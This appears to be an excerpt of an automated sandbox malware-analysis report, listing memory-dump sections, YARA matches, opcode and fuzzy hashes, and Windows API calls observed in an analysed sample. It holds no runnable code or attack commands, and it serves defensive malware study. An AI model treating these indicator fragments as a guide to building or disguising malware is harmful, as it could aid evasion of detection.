                                                                                                    • Source File: 00000002.00000002.2277988619.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_20d0000_1831.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: )Ku$DM_e$S;G%$SV$UGEA$c[G$ox}k$x[G
                                                                                                    • API String ID: 0-3323421312
                                                                                                    • Opcode ID: 6c2c288b3743fe4fbd1b2963644c860e42ee050d0cc4828e002f03bb987ef718
                                                                                                    • Instruction ID: e69a2cf43c390fbbdd4fc637564cc10970b8f30b14bd34f1d37b2c829c59f69d
                                                                                                    • Opcode Fuzzy Hash: 6c2c288b3743fe4fbd1b2963644c860e42ee050d0cc4828e002f03bb987ef718
                                                                                                    • Instruction Fuzzy Hash: 7AD1F27150D3808BD725CF29889436FFBE2AFC160CF1A892CE4E55B349D776850ADB86
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277409733.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2277409733.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_1831.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: ADTD$E$ID$Y$eMOK$vu$vxtq$|xzy
                                                                                                    • API String ID: 0-1466227541
                                                                                                    • Opcode ID: 694bb15107f4bc877fab139e9b3cb1dd418c9edad3bc46051563358933346528
                                                                                                    • Instruction ID: 68c016febbe7a0715404e25fe2d2c1f5bf377f828986e49a58439a2b7b357855
                                                                                                    • Opcode Fuzzy Hash: 694bb15107f4bc877fab139e9b3cb1dd418c9edad3bc46051563358933346528
                                                                                                    • Instruction Fuzzy Hash: 7871E23158C3928AD3118F7AC4A076BFFE09FA2350F1C496DE4D45B392D37989099B9A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277988619.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_20d0000_1831.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: ADTD$E$ID$Y$eMOK$vu$vxtq$|xzy
                                                                                                    • API String ID: 0-1466227541
                                                                                                    • Opcode ID: 694bb15107f4bc877fab139e9b3cb1dd418c9edad3bc46051563358933346528
                                                                                                    • Instruction ID: 2d47eafb8935b0b06afe5a8eb744e6024973220de91ae1ccd98e88d5a6726077
                                                                                                    • Opcode Fuzzy Hash: 694bb15107f4bc877fab139e9b3cb1dd418c9edad3bc46051563358933346528
                                                                                                    • Instruction Fuzzy Hash: 7171F23158D3D68AD3128F7AC4A076BFFE0AF92354F1C496CE4D48B291D3798109EB56
                                                                                                    APIs
                                                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 0042A8F7
                                                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 0042A9CF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277409733.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2277409733.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_1831.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EnvironmentExpandStrings
                                                                                                    • String ID: *$*$q
                                                                                                    • API String ID: 237503144-4001757600
                                                                                                    • Opcode ID: 5f672a718d274909524f70c82779d112448254364d71578b31479b925a6e829e
                                                                                                    • Instruction ID: 6a2a75fc59155a11c5aec0aea031f7e0da65668b1aff7312ce30b4a80edc4f4b
                                                                                                    • Opcode Fuzzy Hash: 5f672a718d274909524f70c82779d112448254364d71578b31479b925a6e829e
                                                                                                    • Instruction Fuzzy Hash: 130212B56083158FD724CF28D89135FB7E1FFC5308F05892DE9999B291DB78890ACB86
                                                                                                    APIs
                                                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 020E80D7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277988619.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_20d0000_1831.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: EnvironmentExpandStrings
                                                                                                    • String ID: 7$TW$WH$}&'$
                                                                                                    • API String ID: 237503144-3022637246
                                                                                                    • Opcode ID: f2589dec76ca3da30d2202253f81892e3db71206ab5a992931fad51fe054197f
                                                                                                    • Instruction ID: ee50367b2212058117bfbf4d506f8a248cf382b712fe6586ff1a730f4199298c
                                                                                                    • Opcode Fuzzy Hash: f2589dec76ca3da30d2202253f81892e3db71206ab5a992931fad51fe054197f
                                                                                                    • Instruction Fuzzy Hash: 8191E275A083528BC714CF28C89036BBBE2FFD9354F288A1CE4C64B765E7748985DB52
                                                                                                    APIs
                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 020D8CEB
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 020D8CF5
                                                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 020D8DDD
                                                                                                    • GetForegroundWindow.USER32 ref: 020D8DF2
                                                                                                    • ExitProcess.KERNEL32 ref: 020D8F6E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277988619.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_20d0000_1831.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 4063528623-0
                                                                                                    • Opcode ID: b5f0f8089672b5e80aed31e02240edf92ffda114601a99c10a6afc8ae68805cc
                                                                                                    • Instruction ID: b70ca7900eac1d71088ad4326fad948813b6be263bc4559a675954f04c9c93c9
                                                                                                    • Opcode Fuzzy Hash: b5f0f8089672b5e80aed31e02240edf92ffda114601a99c10a6afc8ae68805cc
                                                                                                    • Instruction Fuzzy Hash: F7618773B143140FD318AE79DC063AAB6D39BC5720F0FC63D9985EB790EA7888068785
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277988619.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_20d0000_1831.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 50$DM_e$FwPq$Js$'!
                                                                                                    • API String ID: 0-1711485358
                                                                                                    • Opcode ID: c4c1f8e28e835abe653d42ead9130a3bdb40cd1f355abcf11e9a7fb6b3c4c5b3
                                                                                                    • Instruction ID: 78c3dab6ffe4f3d6d08021daa9abf500a7cad071fcc8ef9c4498ca686b9783ab
                                                                                                    • Opcode Fuzzy Hash: c4c1f8e28e835abe653d42ead9130a3bdb40cd1f355abcf11e9a7fb6b3c4c5b3
                                                                                                    • Instruction Fuzzy Hash: F551DAB45493808FE338CF25C991B8BBBB1BBA1304F609A0CE6D95B254CB759446CF97
                                                                                                    APIs
                                                                                                    • FreeLibrary.KERNEL32(?), ref: 00419FF7
                                                                                                    • FreeLibrary.KERNEL32(?), ref: 0041A039
                                                                                                      • Part of subcall function 00442080: LdrInitializeThunk.NTDLL(0044523A,00000002,00000018,?,?,00000018,?,?,?), ref: 004420AE
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277409733.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2277409733.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_1831.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeLibrary$InitializeThunk
                                                                                                    • String ID: mj
                                                                                                    • API String ID: 764372645-1022201683
                                                                                                    • Opcode ID: c086cc875a9495cf51c40eac8dc5e50a76db1f680bda795562031d64835a4f2b
                                                                                                    • Instruction ID: e4b45be28fd4c7cbff433e2c06fe463db16693d42f5f124cafcdabba2620905a
                                                                                                    • Opcode Fuzzy Hash: c086cc875a9495cf51c40eac8dc5e50a76db1f680bda795562031d64835a4f2b
                                                                                                    • Instruction Fuzzy Hash: D76223746093009FE724CF25CC507ABBBE2BB85318F24861EE594573A1E7399C96CB4B
                                                                                                    APIs
                                                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 00425743
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277409733.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2277409733.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_1831.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EnvironmentExpandStrings
                                                                                                    • String ID: 67
                                                                                                    • API String ID: 237503144-1886922373
                                                                                                    • Opcode ID: e3d5ee6a10ef3cb590ca084e24df21bec85322a84b333c3760c72d733834ca72
                                                                                                    • Instruction ID: 69054aec17b57e4c885244c43c85c7a2a523591f4f2f134b8c84ae4bc1ca1ac0
                                                                                                    • Opcode Fuzzy Hash: e3d5ee6a10ef3cb590ca084e24df21bec85322a84b333c3760c72d733834ca72
                                                                                                    • Instruction Fuzzy Hash: 6EB1A9B4508710CBD7109F54E88176BBBE0FF86708F44496EE9849B391E7B9C949CB8B
                                                                                                    APIs
                                                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00425E98
                                                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00425F24
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277409733.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2277409733.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_1831.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EnvironmentExpandStrings
                                                                                                    • String ID: 23
                                                                                                    • API String ID: 237503144-326707096
                                                                                                    • Opcode ID: 68f62ab6bbdc17d543da7d6c80b4e2832be22e5d8e63cefdd40be9526a9cccd6
                                                                                                    • Instruction ID: b6730ddf130f4e2a19c05504fd255247e3d11648143caf2c2a016be5e81be571
                                                                                                    • Opcode Fuzzy Hash: 68f62ab6bbdc17d543da7d6c80b4e2832be22e5d8e63cefdd40be9526a9cccd6
                                                                                                    • Instruction Fuzzy Hash: 7B7112B1A043189FEB20CFA8D841BEEBBB1FB45304F10843DE905AB2C5D775590ACB89
                                                                                                    APIs
                                                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00429C9A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277409733.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2277409733.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_1831.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EnvironmentExpandStrings
                                                                                                    • String ID: 67
                                                                                                    • API String ID: 237503144-1886922373
                                                                                                    • Opcode ID: efaa971be64e3f0e55855db326838b403e2c0136300b1c41449d082944818f00
                                                                                                    • Instruction ID: a5821a17d697f7f316c5e23e8fd2eb7e472b5f5b3478a77b5a5598d7e69c89e3
                                                                                                    • Opcode Fuzzy Hash: efaa971be64e3f0e55855db326838b403e2c0136300b1c41449d082944818f00
                                                                                                    • Instruction Fuzzy Hash: 6D61F0B66083408BD724DF29E88175FB7E1EBC9304F18493DE58997281DB35D905CB8A
                                                                                                    APIs
                                                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00429C9A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277409733.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2277409733.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_1831.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EnvironmentExpandStrings
                                                                                                    • String ID: 67
                                                                                                    • API String ID: 237503144-1886922373
                                                                                                    • Opcode ID: 38b103ba2a0b24bd1f0b7068b570aa69e159151b381139e18933ad9306aeec92
                                                                                                    • Instruction ID: 7ba92da05bbbaddbc1e3305b36c9b0db2ded0e94f959a81563e8173db3a816b3
                                                                                                    • Opcode Fuzzy Hash: 38b103ba2a0b24bd1f0b7068b570aa69e159151b381139e18933ad9306aeec92
                                                                                                    • Instruction Fuzzy Hash: A961FEB66083408FD724DF25D88176FBBE2EBC9304F19493DE5898B281DB75C805CB8A
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277409733.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2277409733.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_1831.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MetricsSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 4116985748-3916222277
                                                                                                    • Opcode ID: 12748a352a6113057c12441240e5b0ee108c97012b660969c1fdd4a02f1b159c
                                                                                                    • Instruction ID: 45907af0f9aaa3a0b9b12b1f6695193350465b50a920b4478e3ecda7c38bd9fb
                                                                                                    • Opcode Fuzzy Hash: 12748a352a6113057c12441240e5b0ee108c97012b660969c1fdd4a02f1b159c
                                                                                                    • Instruction Fuzzy Hash: 23C15BB05093808BE7B0DF64D99979BFBF1BB85308F10992EE5984B354C7B89449CF4A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277409733.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2277409733.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_1831.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: #C}$@-$up$vC
                                                                                                    • API String ID: 0-3794437364
                                                                                                    • Opcode ID: fe4f9d4565ffa40ec65875b6bd9e8bbb556a4c85dd3c3c1a3913f1bfe2a2c7a4
                                                                                                    • Instruction ID: 145fb0a50be3e303ead08e2671ce65b3aa3df702a645c1f6ac8533401e1fa356
                                                                                                    • Opcode Fuzzy Hash: fe4f9d4565ffa40ec65875b6bd9e8bbb556a4c85dd3c3c1a3913f1bfe2a2c7a4
                                                                                                    • Instruction Fuzzy Hash: 9FE1EBB5209340DFE324DF25E88076FBBE1FB86304F54882EE5898B251DB35D945CB9A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277409733.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2277409733.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_1831.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: M;D$>D$UUK
                                                                                                    • API String ID: 0-3649699930
                                                                                                    • Opcode ID: 8ead049028bc91adeff9622f45da0367f919806cf8365be0a15fc24cee2962a3
                                                                                                    • Instruction ID: fc75cb93acbb787b45c4a477a4821f2fed63727632898f6dbcded6a89fb42fc6
                                                                                                    • Opcode Fuzzy Hash: 8ead049028bc91adeff9622f45da0367f919806cf8365be0a15fc24cee2962a3
                                                                                                    • Instruction Fuzzy Hash: 8E22FE3AA08310CFD314DF29E89072BB7E2FB8A315F4A887DD58987361E674D941CB85
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277409733.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2277409733.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_1831.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: M;D$>D$UUK
                                                                                                    • API String ID: 0-3649699930
                                                                                                    • Opcode ID: a4518d19f3d5ce0a92a9632ab1dce3ca5ef1e8b59513adf0c60c32138287e5c1
                                                                                                    • Instruction ID: 5b6f0a5fe011b24c48fd64f61fb35041aa1557f3f4dce62c9b8353607a503f3b
                                                                                                    • Opcode Fuzzy Hash: a4518d19f3d5ce0a92a9632ab1dce3ca5ef1e8b59513adf0c60c32138287e5c1
                                                                                                    • Instruction Fuzzy Hash: 5402DD39A08310CFE314CF29D89072BB7E2BBDA305F4A887DD589873A1D675D945CB85
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277409733.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2277409733.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_1831.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: M;D$>D$UUK
                                                                                                    • API String ID: 0-3649699930
                                                                                                    • Opcode ID: 0e38d297613c04bad4889370033c92b5e70b601f85af2d172c698d41d8b03cdb
                                                                                                    • Instruction ID: 0ffe7b29edef83b041ea382641fdc4149dbc112461c51243b49d827887b3597f
                                                                                                    • Opcode Fuzzy Hash: 0e38d297613c04bad4889370033c92b5e70b601f85af2d172c698d41d8b03cdb
                                                                                                    • Instruction Fuzzy Hash: 2202DD3AA08310CFD314CF29D89072BB7E2BBDA305F4A887DD589873A2D675D945CB85
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277409733.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2277409733.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_1831.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: M;D$>D$UUK
                                                                                                    • API String ID: 0-3649699930
                                                                                                    • Opcode ID: f19334b376416346e53576ffb4c07c93724e4cf39114a0a055eb46b0a26280a2
                                                                                                    • Instruction ID: 86640fba6bac160b05b0c43110ab63d66e8f7ec2f5acf9dcdae8f0d28c6b6e57
                                                                                                    • Opcode Fuzzy Hash: f19334b376416346e53576ffb4c07c93724e4cf39114a0a055eb46b0a26280a2
                                                                                                    • Instruction Fuzzy Hash: 8002ED3AA08310CFD314CF29D89072BB7E2BBDA305F4A887DD589873A1D675D945CB85
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277988619.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_20d0000_1831.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: -jkhanold~m`$anold~m`$d~m`
                                                                                                    • API String ID: 0-185452761
                                                                                                    • Opcode ID: 07d2442547bbedbbbe6c066885c2d67aa08821165203c63c6e7e94bfc294603c
                                                                                                    • Instruction ID: 1d138b33dec07fe6041b449bc1c071e95449d886ca35cdb8be2c291e62352acf
                                                                                                    • Opcode Fuzzy Hash: 07d2442547bbedbbbe6c066885c2d67aa08821165203c63c6e7e94bfc294603c
                                                                                                    • Instruction Fuzzy Hash: 37D1ADB06483808FD754DF68C891B6BBBE0FF85318F14491CEA958B791E7B9D809CB52
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277409733.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2277409733.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_1831.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 5$Tx+$bC
                                                                                                    • API String ID: 0-2958649183
                                                                                                    • Opcode ID: bd69bc838739ae90d4b0a58172e55ce76a86b20f4efd0bead3c1e9785a5287de
                                                                                                    • Instruction ID: 57781aab13a08c1a066b8e14d20b5adcd793598ba32206fb76d556f76c65c1e4
                                                                                                    • Opcode Fuzzy Hash: bd69bc838739ae90d4b0a58172e55ce76a86b20f4efd0bead3c1e9785a5287de
                                                                                                    • Instruction Fuzzy Hash: 66B1C17050C3918AE7358F2990643ABFFE0AF93304F98496ED5C987392D7794409CB56
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277988619.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_20d0000_1831.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 5$Tx+$bC
                                                                                                    • API String ID: 0-2958649183
                                                                                                    • Opcode ID: 878d8cd2ffcbb237619de5602d15ed4e3526d5757278a69bfb0ca6ece5a1916c
                                                                                                    • Instruction ID: 181f43818fdac62acdd6dd2ba623873f8c42776f3cb24030b306d8a37df0b758
                                                                                                    • Opcode Fuzzy Hash: 878d8cd2ffcbb237619de5602d15ed4e3526d5757278a69bfb0ca6ece5a1916c
                                                                                                    • Instruction Fuzzy Hash: A5B1C27050C3C18AE779CF2984A47ABFFE0AF97304F18896DE1D987692D77A8405CB52
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277409733.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2277409733.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_1831.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 5$Tx+$bC
                                                                                                    • API String ID: 0-2958649183
                                                                                                    • Opcode ID: b019f8faa7078be6aa673cad719c14887d56416cdb44293ea95d0146935d494c
                                                                                                    • Instruction ID: c6dbd191573f8eaa778921652fb4887c0da57f4868ba9d7cab245032b22be67a
                                                                                                    • Opcode Fuzzy Hash: b019f8faa7078be6aa673cad719c14887d56416cdb44293ea95d0146935d494c
                                                                                                    • Instruction Fuzzy Hash: D0A1C17050C3918AE739CF2994603EBBFE0AF96304F58897ED5C987392D7794409CB56
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277988619.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_20d0000_1831.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 5$Tx+$bC
                                                                                                    • API String ID: 0-2958649183
                                                                                                    • Opcode ID: 34f0093aad384b58f3953ed85f12a0e3001b075a516edd21357cc8b6ea9ea554
                                                                                                    • Instruction ID: e5d8d064ae71973748a61ffa08fe370d6848a1868748399789024f841ef1ab59
                                                                                                    • Opcode Fuzzy Hash: 34f0093aad384b58f3953ed85f12a0e3001b075a516edd21357cc8b6ea9ea554
                                                                                                    • Instruction Fuzzy Hash: 3FA1CF7050C3C18AE779CF2984A47ABFFE0AF97304F18896DE1D987692D7BA4405CB42
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277988619.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_20d0000_1831.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @-$up$vC
                                                                                                    • API String ID: 0-1828384444
                                                                                                    • Opcode ID: 422b25fc84451906c3cd7cd792491071fe5ff7971ca24ee0d353181616b7cc8a
                                                                                                    • Instruction ID: f8445143057d41332cb4f4693dfb1463bfc2ef7e5c013aa0dbab50882746cf87
                                                                                                    • Opcode Fuzzy Hash: 422b25fc84451906c3cd7cd792491071fe5ff7971ca24ee0d353181616b7cc8a
                                                                                                    • Instruction Fuzzy Hash: BD412EB02497819FE3248FA1D894B9BBBE2BBC6344F148A2DE1D84B351D7788449CF57
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277409733.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2277409733.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_1831.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: !'$27
                                                                                                    • API String ID: 0-1982139352
                                                                                                    • Opcode ID: f59c36ea8d3009de80897bc285a486c4a8992c853654d8c5358ed7f8b9326bec
                                                                                                    • Instruction ID: 5153aecd17f80642fd8c0eece016e91168ea77982d201b76830abc39117f0e9e
                                                                                                    • Opcode Fuzzy Hash: f59c36ea8d3009de80897bc285a486c4a8992c853654d8c5358ed7f8b9326bec
                                                                                                    • Instruction Fuzzy Hash: F5C156B57083109BD7149F29DD9276BB7E1EF81314F88852EE8C58B391E6BCD904C35A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277988619.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_20d0000_1831.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: !'$27
                                                                                                    • API String ID: 0-1982139352
                                                                                                    • Opcode ID: 12ce45a36756b1f70682f7838d54c29fd27cb533d73a7c0cc1eee0f87610a5d7
                                                                                                    • Instruction ID: 53533c2baab899c4d17a4beccc033a1570f54ebb84713c6ee788f96350ac1bbe
                                                                                                    • Opcode Fuzzy Hash: 12ce45a36756b1f70682f7838d54c29fd27cb533d73a7c0cc1eee0f87610a5d7
                                                                                                    • Instruction Fuzzy Hash: 58C124B16483008FD755DF28CC9276BB7E2EF81324F19892CEE858B690E379D905D752
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2277409733.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2277409733.0000000000457000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_1831.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: =$^\
                                                                                                    • API String ID: 0-3808277151
                                                                                                    • Opcode ID: 3ae2f5be3b5b97ffa114b6693e049356c5b1626121661ef7d8dd4ce1dd7da5ce
                                                                                                    • Instruction ID: 449fbb577030d5845b3ff3c78ea8df1dbbecff39a5bc4c3e86ed8d0a83d476b4
                                                                                                    • Opcode Fuzzy Hash: 3ae2f5be3b5b97ffa114b6693e049356c5b1626121661ef7d8dd4ce1dd7da5ce
                                                                                                    • Instruction Fuzzy Hash: 20B1E6B56483428BD328DF25C8A07ABBBE1EFD5315F08892DE4D58B381E77C8845C796
